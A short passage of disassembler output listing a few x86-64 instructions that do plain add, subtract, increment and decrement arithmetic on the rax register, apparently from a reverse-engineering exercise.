│           0x00400093      4883c04f       add rax, 0x4f               ; 79
│           0x00400097      4883e801       sub rax, 1
│           0x0040009b      4883e84f       sub rax, 0x4f               ; 79
│           0x0040009f      48ffc8         dec rax
│           0x004000a2      4883e847       sub rax, 0x47               ; 71
│           0x004000a6      48ffc0         inc rax
│           0x004000a9      4883e843       sub rax, 0x43               ; 67
```
